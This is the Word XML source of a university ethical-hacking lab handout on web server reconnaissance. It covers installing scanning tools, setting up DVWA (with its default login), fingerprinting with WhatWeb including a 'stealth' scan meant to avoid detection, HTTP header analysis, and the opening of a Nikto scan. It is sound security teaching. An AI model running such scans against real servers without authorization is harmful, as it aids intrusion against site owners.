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CFD52" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Week 8 Lab Activities: Hacking Web Servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300EEBA9" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>CCS6324: Ethical Hacking &amp; Penetration Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47738710" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00885E3F" w:rsidP="00D9219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885E3F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:pict w14:anchorId="73F200E1">
          <v:rect id="_x0000_i1025" alt="" style="width:451.3pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="36115465" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>DISCLAIMER &amp; ETHICS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DF6987"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IMPORTANT:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> These labs must only be performed on authorized systems and in controlled lab environments. Unauthorized testing of web servers is illegal. Each student is responsible for obtaining written permission before testing any web infrastructure. Use only provided lab environments or intentionally vulnerable applications designed for training.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E03AC9"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Authorized Testing Scope:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> These activities are limited to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3BE338" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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DVWA (Damn Vulnerable Web Application)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6788D002" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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WebGoat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A0C674" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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HackTheBox retired machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EA0EEE" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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OWASP Juice Shop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4BA28C" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Personal lab environment (VirtualBox/Hyper-V)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A77F6C" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Websites explicitly offering bug bounty programs with written authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D00C4D" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00885E3F" w:rsidP="00D9219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885E3F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:pict w14:anchorId="2618BAB7">
          <v:rect id="_x0000_i1026" alt="" style="width:451.3pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6274DD68" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>LAB ENVIRONMENT SETUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385ECD27"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Prerequisites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F11A00"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Students should have:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677F3AC1" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Linux machine (Ubuntu 20.04+ or Kali Linux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FDE644" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Basic command-line proficiency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2577849D" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Understanding of HTTP/HTTPS from lecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75274091" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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VirtualBox or VMware for vulnerable application deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE4EA17"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Required Tools Installation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F57874"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Ubuntu/Debian-based Linux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511ADCF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Update package manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9C0657"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sudo apt update &amp;&amp; sudo apt upgrade -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ABEED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F60FD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Essential tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CA4FE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sudo apt install -y curl wget netcat-openbsd nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6667E52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CEBE4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Install Go (for Gobuster)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286714C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wget https://golang.org/dl/go1.21.5.linux-amd64.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1594950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lastRenderedPageBreak/>
        <w:t>sudo tar -C /usr/local -xzf go1.21.5.linux-amd64.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0025B74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echo 'export PATH=$PATH:/usr/local/go/bin' &gt;&gt; ~/.bashrc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F5368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source ~/.bashrc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773985B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CB162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Install Gobuster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1D557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go install github.com/OJ/gobuster/v3@latest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3665AAB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export PATH=$PATH:~/go/bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75526C6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15309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Install Nikto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F5D8D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git clone https://github.com/sullo/nikto.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638D5F3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cd nikto &amp;&amp; sudo perl ./nikto.pl -h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4189AA8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5FBAB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Install WhatWeb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488A9E6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sudo apt install -y whatweb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EB976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1D31C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Install FFuF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680B587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sudo apt install -y ffuf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164D976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B66A3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Burp Suite Community (download from portswigger.net)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261690D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Or install via snap: sudo snap install burp-suite-community</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC0149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E21E4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DVWA (Damn Vulnerable Web Application)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB0393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git clone https://github.com/digininja/DVWA.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199018B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cd DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481142F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Follow setup instructions in DVWA README</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59426AFF"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Kali Linux (pre-installed):</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Most tools are already available. Verify:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640FA91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which nikto whatweb ffuf gobuster burp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D73CF0"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Setting Up DVWA Locally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27498BA5"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Using Docker (Recommended):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7F053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docker pull vulnerables/web-dvwa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F80BB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docker run --rm -it -p 80:80 vulnerables/web-dvwa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E715B2"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xml:space="preserve">Access at: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>http://localhost</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Default credentials: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>admin:password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3824CF"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Manual Setup (Ubuntu):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E8D631"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Install LAMP stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6DEA1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sudo apt install -y apache2 mysql-server php php-mysql php-gd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BA81D1"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132CB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Clone DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A7DAC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git clone https://github.com/digininja/DVWA.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1081AE4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sudo mv DVWA /var/www/dvwa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A07E8C1"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7923D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Configure permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E60758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sudo chown -R www-data:www-data /var/www/dvwa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658A6DA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sudo chmod -R 755 /var/www/dvwa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9E5C5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485A6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Setup database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC200F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mysql -u root -p &lt; /var/www/dvwa/docs/SQL/Create_MySQL_User_and_Privileges.sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAC80E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DA61C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Start Apache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE6082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sudo systemctl start apache2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D3997C" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00885E3F" w:rsidP="00D9219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lastRenderedPageBreak/>
      </w:r>
      <w:r w:rsidR="00885E3F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:pict w14:anchorId="1DBFC571">
          <v:rect id="_x0000_i1027" alt="" style="width:451.3pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB3F14D" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>ACTIVITY 1: WEB SERVER FINGERPRINTING WITH NETCRAFT &amp; WHATWEB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083D0D37"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Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Learn to identify web server versions, technologies, and infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29309C5F"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Time:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> 45 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EBB47D"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Difficulty:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Beginner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1578004C"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1: Passive Fingerprinting with Netcraft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B011C4" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Open web browser and navigate to: https://sitereport.netcraft.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A661D8" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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xml:space="preserve">Enter target domain: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22048CEA" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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xml:space="preserve">Review report sections: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239EA0C9" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Hosting history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178B0634" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Server technology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B79C1CC" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Operating system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190C7ED6" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Network information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6A9569" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Mail server configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F2A36E"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1.1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> What web server software does example.com use? What operating system?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257474FA"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1.2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Are there any historical DNS records? What do they reveal about infrastructure changes?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB84F44"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2: WhatWeb Fingerprinting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC5E999"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Basic Scanning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9F833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whatweb http://localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15791598"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Aggressive Scanning (more thorough, slower):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613E286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whatweb --aggressive http://localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A1F75A"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Stealth Scanning (avoid detection):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689B070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whatweb --user-agent="Mozilla/5.0" http://localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6A188D"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Output Analysis:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673C8DB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Target: http://localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1916BEE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Title: DVWA - Damn Vulnerable Web Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A5F6E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Apache 2.4.41 (Ubuntu)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FD35F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PHP 7.4.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0AF90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MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FF536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Cookies: PHPSESSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2FB7E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X-Powered-By: PHP/7.4.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AE6A17"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lastRenderedPageBreak/>
        <w:t>Questions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E28BA1D" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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1.3:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> What technologies does DVWA use? List all identified components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B78C87E" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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1.4:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> What information disclosure vulnerabilities do these headers present?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B0816F"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3: Manual Header Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65625C3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View all response headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09794CA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-v http://localhost/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7D865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98A1B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Extract specific headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31817E1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-I http://localhost/ | grep -i "server\|x-powered\|x-aspnet"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD0100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04A3A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Test HTTPS/TLS version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590825B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openssl s_client -connect example.com:443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289B15A0"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Examine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60996D8B" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Server: header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790C6634" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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X-Powered-By: header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB9CAA1" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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X-AspNet-Version: (if applicable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519F7880" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Any custom headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDEA3A2"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1.5:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> What sensitive information is exposed through HTTP headers? How would you mitigate this?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11387597" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00885E3F" w:rsidP="00D9219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885E3F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:pict w14:anchorId="6106340D">
          <v:rect id="_x0000_i1028" alt="" style="width:451.3pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E03DF86" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>ACTIVITY 2: NIKTO VULNERABILITY SCANNING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A2DDF7"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Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Perform automated web server vulnerability assessment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442A0EBE"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Time:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> 60 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8469D7"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Difficulty:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Beginner to Intermediate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDD1647"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1: Basic Nikto Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AC6BF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nikto -h http://localhost -output nikto_report.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB7028D"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Output Format:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E9C5E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Server: Apache/2.4.41 (Ubuntu)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115ABB6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Root page / redirects to: /login.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D397D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Uncommon header "X-Frame-Options" found...</w:t>
      </w:r>
    </w:p>
